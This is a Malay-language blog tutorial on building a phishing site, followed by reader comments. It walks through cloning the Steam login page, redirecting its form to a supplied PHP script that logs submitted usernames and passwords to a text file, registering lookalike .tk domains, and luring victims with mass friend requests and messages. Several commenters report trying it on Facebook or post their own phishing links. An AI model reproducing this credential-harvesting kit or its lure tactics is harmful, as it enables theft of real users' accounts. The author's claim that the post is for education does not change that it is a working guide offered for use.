Tutorial : Belajar Phishing (Asas)

Hai Semua..

Artikel ini adalah Asas Dalam Phishing..
Selamat Mencuba dan jangan rasa boring... :)

*** Artikel Ini Sangat Panjang...
*** Jika Anda Berminat Maka Rajinkan Diri Anda Membaca

Dalam tutorial ini saya akan cuba untuk membimbing anda melalui membuat Phisher pertama anda.

Ya, ada banyak panduan lain di luar sana mengenai masalah ini, tetapi panduan ini juga akan menjelaskan kepada anda bagaimana segala sesuatu bekerja bukan sahaja hanya memberitahu anda untuk melakukan ini dan kemudian itu.

Tutorial ini semua bekerja untuk hampir halaman yang anda inginkan untuk Phish. Saya akan cuba untuk memasukkan beberapa contoh umum laman popular untuk Phish juga.

Hal pertama adalah anda ingin lakukan untuk menentukan halaman apa yang ingin anda Phish kepada pengguna. Runescape.com? Wap pengguna? Face.book? My.space? Ini boleh menjadi apa pun yang anda inginkan, hanya pastikan anda benar-benar mengetahui jenis pengguna yang anda inginkan untuk Phish.

Pertama sekali, pergi ke http://www.ripway.com.

Website ini direka untuk membolehkan anda untuk meng-upload file dalam .Txt dan .Php format. Hal ini sangat berguna bagi kami, kerana kami benar-benar perlu tempat di internet untuk benar-benar host laman kami dengan semua maklumat login. Kami juga memerlukan seseorang untuk meng-host laman Phisher kami, Ripway bekerja untuk ini juga.

Sekarang, membuat akaun di Ripway.com .. Username dan Password pula mengikut kesukaan anda, dan yang mudah anda ingat, tetapi berhati2 jangan sharekan akaun anda kepada sesiapa, kerana dia juga dapat menikmati kehebatan Phish ini. heheh

Sekarang, langkah berikutnya adalah untuk mencipta semua fail yang anda perlukan untuk Phisher anda bekerja.

Sebuah struktur Phisher dibahagi menjadi 3 file:

1. Laman Phisher - Seakan-akan website yang rasmi dan memberikan "pelanggan" anda percaya.
2. Script Phisher - Script yang boleh beroperasi dan berkesan.
3. Sistem log - file ini akan beroperasi dalam memberikan info usernma dan passowrd.


Pertama, kita harus membuat halaman yang sebenarnya anda ingin agar "pelanggan" untuk melihat. Fikirkan tentang laman apa yang ingin anda salin/copy .. Facebook, anda jelas memerlukan Facebook halaman log masuk. Untuk Wap atau Runescape, ini tidak begitu jelas. Pastikan anda menyalin/copy laman yang benar-benar rasmi dan bahawa orang-orang akan berfikir mereka telah log in pada website yang sepatutnya. Untuk wap, saya secara peribadi memilih "https://store.steampowered.com/login/", tetapi lebih rumit Runescape .. Bergantung pada apakah anda ingin Runescape Classic Phisher atau hanya yang normal .. Jika anda ingin yang normal, anda boleh menyalin/copy laman di mana anda masuk ke forum, tapi jika anda memerlukan satu yang Classic, cuba cari http://www.google.com anda dan taip "Login to play Runescape Classic" atau sesuatu yang sama seperti itu. Dengan cara ini anda dapat menemukan Phisher orang lain dan kemudian menyalinnya/copy. Cara ini juga sangat mudah.. dan membolehkan ianya nampak lebih menarik

Sekarang cari laman yang ingin anda salin/copy, pastikan ada yang login di halaman. Sebagai contoh, saya akan menggunakan "https://store.steampowered.com/login/" untuk menunjukkan bagaimana sesuatu projek itu bekerja/beroperasi. Pergilah ke laman yang ingin anda salin/copy. Seterusnya, anda perlu melihat 'kod sumber halaman' atau Source Code .
Kod sumber halaman (source code) yang merupakan bahasa dalam HTML. Kod sumber (source code) secara umum bagaimana semua laman web yang dibina. Itulah yang kod HTML. Untuk menyalin/copy halaman, kita hanya perlu melihat "kod sumber" (source code) dan copy semuanya ke dalam direktori Ripway.com kita sendiri. Kami akan melakukan itu melalui langkah-langkah berikut:

Pertama, seperti yang saya katakan sebelumnya, pergi ke laman yang diingini. Contoh Saya menggunakan https://store.steampowered.com/login/. Jika anda ingin menyalin halaman lain seperti Facebook atau Runescape atau apa pun yang anda inginkan, hanya pergi ke laman tersebut bukan Wap's, dan salin/copy kod sumber (source code) itu sebagai membina site yang palsu!
Sekarang, di Firefox, cuba 'right-click' di suatu tempat di laman dan tekan "View Page Source" .. Atau, anda boleh pergi ke menu di atas Firefox dan tekan View -> Page Source (Crtl + U). lakukan trik ini.

Contoh Gambar :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiueh5-vHnG_qiMRNFqUiAPD-O1fwnciP2cZq8pRFcrOCjMiEzljPE6Xm0HySpiDZ7usmQARteq1CHQT3MK3EREq1k5DGvlrIbXeBEtE7B3Lbm6UppevRaYgWRjprl7xHJuW8KLi6t6mXI/s1600-h/phish01.jpg
Bila keluar 'pop-up'.. salin/copy semua (Crtl + A) dan 'Right-click' dan tekan 'Copy'.

Contoh Gambar :
http://img3.imageshack.us/img3/3392/phish02.jpg

Sekarang, masuklah ke Ripway.com dan log in ke akaun anda. Pergi ke "My Files" dan tekan "Create Text File" .. Untuk "File Name", masukkan login.php.
Dalam BlankBox, anda 'right-click' dan tekan "Paste". Sekarang anda telah menyalin halaman yang diinginkan, klik "Create" butang, dan Yeahaaa! Anda telah membuat salinan dari halaman yang anda inginkan. Tahniah!

Contoh Gambar :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVyX820ZRjB0xF_x3PUcxflVWVLkatJCcKr7NM4Ka_kDUsvaKk7VYid_yEFqBrxXHUTSk6HrxdImjHtL-3xovKm4Ndjbxf0nDPANUqsf3xb8UCbEzWh1Xyx_NmYo-0RkMNIbd_8n4MaBM/s1600-h/phish03.jpg

Sekarang, ketika orang log masuk ke halaman anda, anda akan menemui masalah: Maklumat yang mereka masukkan dihantar ke Wap (atau Facebook, atau Runescape, atau apa pun) .. Yang ini adalah masalah yang kita temui! Kita perlu untuk memastikan Maklumat Masuk dan menghantar Script kami, yang kita perlu dibuat segera. Script akan menetapkannya kepada passwords.txt fail yang mengandungi semua password.


Bagus, Mungkin sekarang anda memahami, dan sekarang pergi ke "My Files" dan klik "Edit" pada file login.php anda .. Anda akan melihat Source Code yang anda masukkan dahulu. Anda perlu mengedit ini untuk memastikan kod anda dihantar ke skrip anda. Untuk melakukan hal ini, cukup tekan Ctrl + F pada Firefox (atau Ctrl + b di Internet Explorer saya rasa) untuk membawa sebuah Search Bar. cari pada "action =" .. Ini akan mencari source code dan mendapati semua kes "action =" .. action = adalah sebahagian daripada kod HTML, dan mengatakan bahawa ketika operasi dilakukan (Yang bermaksud bahawa seseorang menekan butang Masuk) maka ada sesuatu yang dilakukan. Lagi pula, ketika alat pencarian menemukan sebuah contoh dari "action =" mesti sama dengan kod dibawah ini:
<form name="logon" action="https://store.steampowered.com/login/" method="POST" onsubmit="doLogin(); return false;">

Dan Tukarkan kepada :
<form name="logon" action="http://h1.ripway.com/yourusernamehere/phishing.php?login_attempt=1" method="POST" onsubmit="doLogin(); return false;">

*** Notis : Pertukaran hanya "https://store.steampowered.com/login/" kepada "http://h1.ripway.com/yourusernamehere/phishing.php?login_attempt=1"
*** Link lama (official site) kepada Link Kita (ripway).

Sekarang apa yang hanya kita lakukan, hanyalah: Apabila seorang mangsa menekan butang login, maklumatnya akan dihantar ke script yang telah kita setkan .. Script akan beroperasi dan menyimpan data pada phishing.php, dan kita akan mendapatkan kod2 yang diperlukan.
Pastikan kod anda diedit seperti yang saya katakan, menyimpan fail anda, dan kemudian meneruskan.

Contoh Gambar :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7yiF-6cJrSIWYr3AzU9wnUkfkOjUp5NSFi-hzPp8X9pFb5zh7fRFOzOwlYwkQe_tSZwZrLBWrhfH8upiCYs4HRPmMgjfP_nAm4gqhcEiZ6_4QV2ZAj13eJHk2xvUoJKF-LFUk9B4TprE/s1600-h/phish04.jpg

Hal berikutnya yang harus kita lakukan adalah membuat skrip! Tetapi jangan risau disini salah telah sediakan skrip untu anda!
Sekarang, pastikan anda telah menyimpan/save fail dahulu, dan kemudian klik "My Files" sekali lagi. Klik "Create Text File" lagi dan di "Enter a file name:" masukkan "phishing.php" tanpa tanda " ".

Sekarang, kod yang perlu anda salin/copy dan masukkan ke fail baru anda ini:
<?php
header ('Location: http://h1.ripway.com/YOURUSERNAMEHERE/login.php ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
*** Ubah pada USERNAMEHERE kepada username anda di ripway

Mesti anda tertanya-tanya.. kenapa script ini diperlukan? betul?
Script ini berfungsi menerima Username dan Password dari laman anda yang sebenarnya, dan kemudian menulis di sebuah fail yang bernama "passwords.txt" kerana anda mungkin boleh melihat daripada kod di atas.

Contoh gambar :
http://img196.imageshack.us/img196/9039/phish05.jpg

Sekarang apa yang penting adalah savekan sebagai "phising.php", heheh dan kerja kita hampir selesai...

Hal berikutnya yang perlu dilakukan adalah untuk mencuba phish yang kita buat tadi! Pergi ke "My Files" sekali lagi, dan tekan butang "Direct link:" pada halaman login.php anda. Selepas itu anda akan secara automatik terus ke laman palsu anda. Hahaha.. dan mesti ianya kelihatan seperti Official Site (Rasmi) sama seperti yang anda salin/copy source code. Sekarang, cuba memasukkan beberapa Perkataan Rawak di kota Username dan Password dan tekan "Log in" .. Pergi "My Files" dan semak jika ada file baru bernama passwords.txt .. SEMESTINYA ADA! Buka fail, dan anda akan melihat password dan nama pengguna phished! Berjaya!!!!, anda baru saja phished diri sendiri!
Jika ini tidak beroperasi seperti yang sepatutnya, jika tidak sila check semua mana PART yang tertinggal. Jika anda masih mengalami masalah, sila posting di sini dan saya akan membantu anda.. :)

Contoh gambar :
http://img11.imageshack.us/img11/3476/phish06.jpg
Oklah setelah selesai diatas, sekarang fail kita untuk Phisher dilakukan dan siap untuk digunakan, kita masih mempunyai beberapa perkara untuk dilakukan.
Cuba Fikirkan sesuatu.. Siapa yang ingin pergi ke sebuah halaman yang disebut http://www.ripway.com/youusernamehere dan letakkan password mereka? Tiada seorang pun!
Itu sebabnya, anda perlu pergi ke http://www.Dot.Tk.
Laman site ini memberikan anda link yang baru. Tk adalah domain secara PERCUMA! domain ini kemudian melencongkan mangsa anda ke laman anda!

Itu jika menggunakan domain free.. kalau nak lebih EXTREME, beli domain dan RIP-kan dengan ayat2 yang habis sama dengan official site.. heheheheheh (bukan mengajar jahat tapi sebagai pendidikan, gunakan otak yang ada)

Sekarang, pergi ke http://www.dot.tk dan masukkan link ke laman phishing. Link ini boleh ditemui dengan pergi ke http://www.ripway.com -> "My file" dan pada file "login.php" pastikan ianya "Direct link:" .. Salin/copy alamat yang berdaftar di sana! Kemudian Paste ke http://www.dot.tk. Anda akan dibawa ke laman di mana anda boleh cuba untuk mendapatkan nama halaman yang baik.
Sekarang cuba anda cari nama yang benar-benar yang boleh menyakinkan meyakinkan! Cubalah untuk menggunakan kata-kata yang "rasmi" untuk membuatkan terdengar lebih meyakinkan. saya memilih untuk menggunakan "www.officialsteampowered.tk" ketika saya melakukan phishing saya, jadi cubalah untuk mendapatkan sesuatu menarik di situ. Menjadi kreatif, dan ingat untuk membuat sesuatu yang Betul-betul begitu nyata sehinggakan mangsa anda percaya akan menjadi Site yang betul2 Rasmi!
Jika anda sudah menjumpai laman yang begitu sesuai untuk anda, Daftarkab terus. Jika anda ingin, anda boleh memilih "Free user" dan tidak perlu memasukkan email, tapi anda tidak akan mampu mengubah domain yang akan dibina.. pilihlah mana satu yang terbaik untuk anda.

Contoh gambar :
http://img188.imageshack.us/img188/3931/phish07.jpg
Sekarang apa yang perlu dilakukan, kita hampir selesai dengan Phisher. Buka 'New Tab' dan di address bar, cubalah untuk menaip dalam domain anda baru mendaftarkan tadi. Adakah itu menuju kearah halaman anda? Jika ya, anda telah berjaya membuat Phisher anda sendiri!.. Tahniah Diucapkan..

"Akhirnya, kita selesai membina phish sendiri" mungkin anda rasa tidak percaya? betul? tetapi ianya pun telah berjaya.Untuk mendapatkan lebih banyak dan lebih menarik, sebarkan website anda kepada sesiapa saja dan anda mendapatkan Username dan Password. Ini adalah langkah terakhir, dan saya akan cuba untuk memberikan idea-idea tentang cara untuk melakukan perkara ini ..
Untuk mendapatkan akaun wap, saya hanya membuat akaun baru dengan tidak ada permainan dan mula menambah LEBIH RAMAI kawan-kawan melalui profil komuniti wap. Hari berikutnya saya punya 115 teman, dan saya menghantar mesej ini kepada semua orang yang sedang online:

"Hai Salam kenalan dari saya.. mari masuk ke profile saya..." (sebagai contoh di facebook,myspace dan friendster.."

Kebanyakkannya akan membalas atau tidak. berikan mereka link http://www.yourdomainhere.tk (link ini utk artikel diatas..).. dan segenlitir akan memasuki website.. dalam beberapa ketika dia akan DISCONNET dari server atau LOGOUT.. maka dengan senang hati dia memasukan Username dan Password sebenar. Dan saya pasti anda akan menerima sesuatu pada password.txt. heheheheh.. betul..

Ini akan menjadi akhir panduan saya. Saya menikmati menulis ini.. tetapi ianya sebagai pengajaran dan pendidikan kepada yang berminat IT. saya tahu banyak panduan phish diluar sana yang anda.. dan kemungkinan ini adalah versi bahasa melayu..

Jika anda seorang yang kreatif.. anda boleh mengubah pada SCRIPT HTML.. kepada yang lebih menarik.. sebagai contoh..
** Apabila seorang LOGIN ketempat anda dan memberikan Username dan Password dan kemudian menekan butang LOG IN secara automatik website phish anda beroperasi
dalam menghantar data ke password.txt dan hantar ke Page Sebenar dan Direct link ke laman rasmi (official site).. sukar untuk memahami kerana dari segi bahasa it dan bahasa melayu. harap maaf..

Sebarang pendapat, Komen dan apapun.. sila bagi FeedBack Anda disini..
sekian terima kasih..

Contoh Phishing Untuk Anda :
Login Site : http://h1.ripway.com/triple9h/login.php
Pass received : http://h1.ripway.com/triple9h/passwords.txt

*** Jangan meletakan email sebenar dan password anda.. link ini adalah sebagai contoh phish yang telah dibuat. sekian terima kasih. segala risiko tanggung sendiri..





10 comments:

Anonymous said...

wauww.. terbaekkkkk!!
tutorial lengkap..!!

Anonymous said...

wah, mmg hebat ko bro...
aku dah cuba phish facebook pastu daftar kat dot.tk tue tp malangnya, dah ada dah yg pakai web tuh..
cissss...
tapi takper, aku cuba kat lain pulak...
apa2pon, terbaik lah bro...

Anonymous said...

bro, nk tanye sikit klau aku tgh lyn fb, tibe2 log out, pastu kene msk user id ngan pwrd.(Berlaku bulang2 kali). Adakah aku kene phish?

999 said...

kepada Anonymous..

kalau anda tgh layan facebook, kemudian log out..
sila check pada browser.. jika ianya masih dalam "www.facebook.com".. maka kemungkinan server dia maintanance..

tetapi jika anda.. bukan di website rasmi.. kemungkinan anda terkena phish..

selalunya mereka mengenakan phihs ni bila anda diberikan link www.facebook tetapi direct kepada website www.facezbook.. (ada "z" sebagai contoh)..

jadi untuk itu berhati2 ketika memasukkan id anda. check pada BROWSER anda!!

sekian terima kasih..

*anda tidak terkena phish jika secara automatik logout.. tetapi jika anda klik2 mana link dan terus logout maka anda terkena phish.

Anonymous said...

" Apabila seorang LOGIN ketempat anda dan memberikan Username dan Password dan kemudian menekan butang LOG IN secara automatik website phish anda beroperasi
dalam menghantar data ke password.txt dan hantar ke Page Sebenar dan Direct link ke laman rasmi (official site).."

mcm mn nak buat... bg contoh html tu
maka c :P

Dzasc Skachers said...

sanagt berterima kasih.. :-)
complete tutorial..

nun said...

bolehkah pengguna macbook mengunakan phishing??

amad said...

http://h1.ripway.com/budaqhacker/login.php

tawil said...

adakah cara ini masih boleh digunakan

Anonymous said...

kenapa tak dapat maklumat victim ye ??

Post a Comment